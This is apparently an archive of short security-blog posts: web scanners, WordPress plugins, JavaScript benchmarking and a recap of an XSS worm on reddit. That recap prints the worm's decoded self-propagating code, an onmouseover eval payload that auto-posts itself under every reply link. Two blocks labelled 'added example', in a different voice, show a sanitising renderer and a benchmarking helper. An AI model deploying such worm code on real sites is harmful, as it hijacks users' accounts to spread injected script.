Recently Larry Suto published his second paper on web application security scanners (if you are wondering about his first one, you can find it here) and as expected it once again stirred up a couple of people.
And while he analyzed the most used web security scanners, I wonder if we could change direction and focus on a not so well known, open source web application scanner.
You have probably figured out by now what I'm talking about; as written in the title, I'm talking about the "web application attack and audit framework", or w3af.
The authors describe it briefly:
w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.
While this resembles the idea (and direction) with which the project started, to me it seems that w3af is as much a framework as Joomla! is a framework for web application development. I would rather call it a full featured web application testing platform.
Even if I'm not that big a fan of automated vulnerability scanners, I have to admit that w3af has a nice set of discovery plugins, which is reason enough for me to give it a thumbs up.
That's all I wanted to share with you today. For more information about w3af I recommend their SourceForge page and Andres Riancho's interview for the OWASP podcast (this dude is the core developer of w3af).
Being an IT security enthusiast and knowing that most of the websites out there don’t take security seriously, I’m rarely surprised about big websites being compromised.
But this time I have been amazed, not because of a vulnerability, but because of the attention Grooveshark gives to its users: a security warning for users that aren't up to date with Adobe Flash, every time you enter the website… image here.
Bravo. It’s an example I would expect others to follow as well.
P.S. they have a great error page when the service is down.
Today, when reddit was down for maintenance, people kept gathering on the #redditdowntime channel on freenode, where within a couple of minutes intriguing things started to happen.
You can read the whole story here (and come back afterwards).
(continue)
Today someone came to this blog searching for a twitter backup facility. I never did post such an application/script so I figured I’d share my way of backing up my tweets.
I actually never back up my tweets (nothing of value would be lost), and never intend to, but for the sake of posting something I said I'd give it a go.
(continue)
Yesterday I read a funny article on TechTarget.
Funny from my perspective, because the author seemed to be really serious about the subject. In a few words, the author suggests that webmasters use the HTML encrypter (it is actually an encoder) as an "effective deterrent".
As if people would really sacrifice indexable content and accessibility for a false sense of security… come on, it must be a joke.
As I am writing this a JavaScript worm is having fun spreading on reddit. On the one hand we should be happy it only spreads and does not do anything else (you know, like cookie theft). On the other hand, it may be an attempt to DDoS reddit, because I'm suddenly starting to get error pages…
An error occurred while processing your request.
Reference #97.27c37259.1254106488.35b1d0e
The (decoded) code of the worm is the following:
// generate payload/attack vector
// having trouble understanding why this works
z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";
// and what's with the 9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d ?
// "click" all reply links in page
o=document;
e=o.getElementsByTagName('a');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='reply')
$(e[i]).click();
// fill with payload
o=document;
e=o.getElementsByTagName('textarea');
for(i=0;i<e.length;i++)
e[i].value=z;
// submit
e=o.getElementsByTagName('button');
for(i=0;i<e.length;i++)
if(e[i].innerHTML=='save'&&e[i].style.display!='none')
$(e[i]).click();
While writing this article I tried to look for the faulty filtering in the source code, but as this was my first time touching the code, I had no sense of direction. If someone would be kind enough to enlighten me as to which file the code resides in, I'd be more than happy.
If not, we'll have an unsolved mystery :)
UPDATE: the worm author has happily shared their way of evading the filter.
UPDATE 2: post about the bug on the reddit blog.
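The worm above gets its payload into the page through the comment markdown: a link whose URL part carries an onmouseover handler. The following is an added example, not reddit's renderer and not the worm author's code, and it does not claim to reproduce the actual reddit filter bug (the post does not describe it). It contrasts a constructed naive link renderer, which drops the URL into an unquoted attribute with no escaping, against a hardened one that allowlists the URL scheme, rejects whitespace and quote characters in paths, and HTML-escapes everything else. The sample inputs are constructed; the worm-shaped one only mirrors the `(/onmouseover=eval(unescape(this.innerHTML))//)` form seen in the decoded code.

```javascript
// Added example: minimal inline-link renderer, naive vs. hardened.
// Not reddit's code; the "naive" bug is constructed to show the class of
// mistake (user-controlled URL reaching an HTML attribute unsanitised).

const ESC = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESC[c]);
}

// Parse one inline link "[text](url)" starting at md[i] === '['.
// Parentheses inside the URL may nest (eval(unescape(...)) in the worm).
// Returns { text, url, end } or null if no link starts here.
function parseLink(md, i) {
  const close = md.indexOf(']', i + 1);
  if (close === -1 || md[close + 1] !== '(') return null;
  let depth = 0;
  for (let j = close + 2; j < md.length; j++) {
    const c = md[j];
    if (c === '(') depth++;
    else if (c === ')') {
      if (depth === 0) {
        return { text: md.slice(i + 1, close), url: md.slice(close + 2, j), end: j + 1 };
      }
      depth--;
    }
  }
  return null;
}

// Walk the text, emitting links via emitLink and everything else via escapeText.
function render(md, emitLink, escapeText) {
  let out = '';
  let last = 0; // start of text not yet emitted
  let i = 0;
  while (i < md.length) {
    if (md[i] === '[') {
      const link = parseLink(md, i);
      if (link !== null) {
        out += escapeText(md.slice(last, i)) + emitLink(link.text, link.url);
        i = link.end;
        last = i;
        continue;
      }
    }
    i++;
  }
  return out + escapeText(md.slice(last));
}

// Naive (constructed bug): unquoted href, nothing escaped, no scheme check.
function renderNaive(md) {
  return render(md, (text, url) => '<a href=' + url + '>' + text + '</a>', (s) => s);
}

// Hardened: only site-relative paths without whitespace/quotes/brackets,
// or absolute http(s) URLs, survive; anything else (javascript:, data:,
// "//evil", attribute-breaking characters) turns into plain text.
function safeUrl(url) {
  const u = url.trim();
  if (/^\/(?!\/)[^\s"'<>]*$/.test(u)) return u;
  try {
    const p = new URL(u); // throws on relative input
    if (p.protocol === 'http:' || p.protocol === 'https:') return p.href;
  } catch (_) { /* not an absolute URL */ }
  return null;
}

function renderSafe(md) {
  return render(md, (text, url) => {
    const href = safeUrl(url);
    const t = escapeHtml(text);
    if (href === null) return t; // drop the link, keep its text
    return '<a href="' + escapeHtml(href) + '" rel="nofollow">' + t + '</a>';
  }, escapeHtml);
}

// Constructed samples: the second one mirrors the shape of the worm's link.
const SAMPLES = [
  '[x](/ onmouseover=alert(1))',
  '[x](/onmouseover=eval(unescape(this.innerHTML))//)',
  '[click](javascript:alert(1))',
  '<b>hi</b> [s](https://example.com/a?b=1&c=2)',
];
for (const s of SAMPLES) {
  console.log('naive:', renderNaive(s));
  console.log('safe: ', renderSafe(s));
}
```

With the first sample the naive renderer emits `<a href=/ onmouseover=alert(1)>`, an injected event handler; the hardened one emits just `x`. The worm-shaped URL is accepted as a site-relative path but ends up quoted and inert inside `href`, where `onmouseover=` is merely part of the path.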
There are a number of ways to benchmark JavaScript code. One is the Firebug console API, for example:
console.time("first");
// some javascript code
console.timeEnd("first");
Another is the one ppk suggested on his blog:
function testIt() {
var startTime = new Date().getTime();
// actual DOM functionality to be tested goes here
setTimeout(function () {
var endTime = new Date().getTime();
var result = (endTime-startTime)/1000;
// print result
},10)
}
The reason the result is read in a separate function scheduled with a timeout is:
(…) some browsers only apply the result of the test (i.e. the changes in the DOM you want to test) to the screen after the function has ended entirely. (…) The correct way of conducting this test is setting a timeout for reading out the end time. The function ends when the in-memory DOM manipulation has been done, which allows the browser to apply the changes.
If that's the case, we could also use the following function for benchmarking JavaScript code (a more flexible version):
function benchmark(func) {
var startTime = new Date().getTime();
func();
var endTime = new Date().getTime();
return (endTime-startTime)/1000;
}
// as for usage
var time = benchmark(function() {
// javascript code to benchmark
});
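The version above reads the end time synchronously, so by ppk's own argument it measures script time only, not the browser applying DOM changes. The following is an added example, not code from the original post or from ppk: it keeps the flexible "pass a function" shape but repeats the run and reports min/median/mean (one run is mostly noise), and adds a deferred variant that takes the end time in a setTimeout callback as ppk recommends. It assumes `performance.now()` is available, falling back to `Date.now()`; the workload is constructed.

```javascript
// Added example, not from the original post. Repeated synchronous benchmark
// plus a deferred variant in the spirit of ppk's timeout trick.

// High-resolution clock where available (browsers, Node >= 16), else Date.now.
const now = (typeof performance !== 'undefined' && typeof performance.now === 'function')
  ? () => performance.now()
  : () => Date.now();

// Run fn `iterations` times and summarise per-run wall-clock time in ms.
function benchmark(fn, iterations = 10) {
  if (!(iterations >= 1)) throw new RangeError('iterations must be >= 1');
  const times = [];
  for (let i = 0; i < iterations; i++) {
    const start = now();
    fn();
    times.push(now() - start);
  }
  const sorted = times.slice().sort((a, b) => a - b);
  const total = times.reduce((a, b) => a + b, 0);
  return {
    runs: iterations,
    min: sorted[0],
    median: sorted[Math.floor(sorted.length / 2)],
    mean: total / iterations,
    max: sorted[sorted.length - 1],
  };
}

// Deferred variant: fn runs now, but the end time is taken from a timeout
// callback so the browser gets to apply (render) DOM changes first.
// Resolves with elapsed ms; note it includes the timeout delay itself,
// exactly as ppk's original does.
function benchmarkDeferred(fn, delay = 10) {
  return new Promise((resolve) => {
    const start = now();
    fn();
    setTimeout(() => resolve(now() - start), delay);
  });
}

// Constructed CPU-bound workload for demonstration; returns sum of i % 7.
function sampleWork(n = 200000) {
  let acc = 0;
  for (let i = 0; i < n; i++) acc += i % 7;
  return acc;
}

// Usage
if (typeof require !== 'undefined' && require.main === module) {
  console.log(benchmark(sampleWork, 20));
  benchmarkDeferred(sampleWork).then((ms) => console.log('deferred:', ms.toFixed(2), 'ms'));
}
```

In a browser, replace `sampleWork` with the DOM manipulation under test and compare `benchmark` against `benchmarkDeferred`; the gap between the two is the rendering cost the synchronous version cannot see.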
This is completely unrelated to any aspect of security, but some topics just make me want to blog about them… Anyway, I'll post again very soon; I have a few projects I've been working on lately.
As some of you may have noticed, news about ImageShack being hacked started to circulate today. By the time I tried to see this for myself, part of the damage had been fixed; I say part because the ImageShack blog is still throwing database connection errors…
Even though this may have been worse for users who store their images there (myself included), there is more to it than meets the eye.
(continue)
Like any other IT security enthusiast, I have limited trust in the platforms I use, in this case WordPress. The intention was there (to write my own blogging platform) but I quickly gave up on it, mostly due to lack of time…
I had to make a compromise: use the platform but try to secure it as well… But instead of applying security from outside the platform, this time I was going to write WordPress plugins to do the job… Five or ten minutes into coding, I was like:
Wait! What the fuck am I doing? WordPress has got a huge number of extensions; for sure it has security-oriented ones as well.
And I was right… after browsing through them for a couple of minutes (I didn't say there were many) I came up with the following list of security extensions that I liked: Login LockDown, Paranoid911, Restrict Login By IP, Times to Come security plugin and WP Security Scan.
(continue)
There are a couple of security auditing frameworks out there, and the temptation to create your own is high, whether in Perl, Ruby, Python or, why not, PHP as well.
Needless to say, I too was tempted to create my own framework. Ideas kept flowing in, the project was started and then BAM, I read an interesting article on GNUCITIZEN which made me rethink my strategy…
One of the comments pointed it out very well:
most of the stuff we need is on the shell already. pentesting frameworks is like the new security-testing hype. first we had hundreds of portscanners, then hundreds of webapp MiTM proxies, then hundreds of fuzzers, then hundreds of SQL injectors, now it’s about pentesting frameworks :)
So instead of starting to write redundant code, I started learning the already available command line tools, which have years of development behind them and cover almost every need.
Basically I'm building my framework around already available tools, and only coding up things that do not exist, or for some very particular cases.
(continue)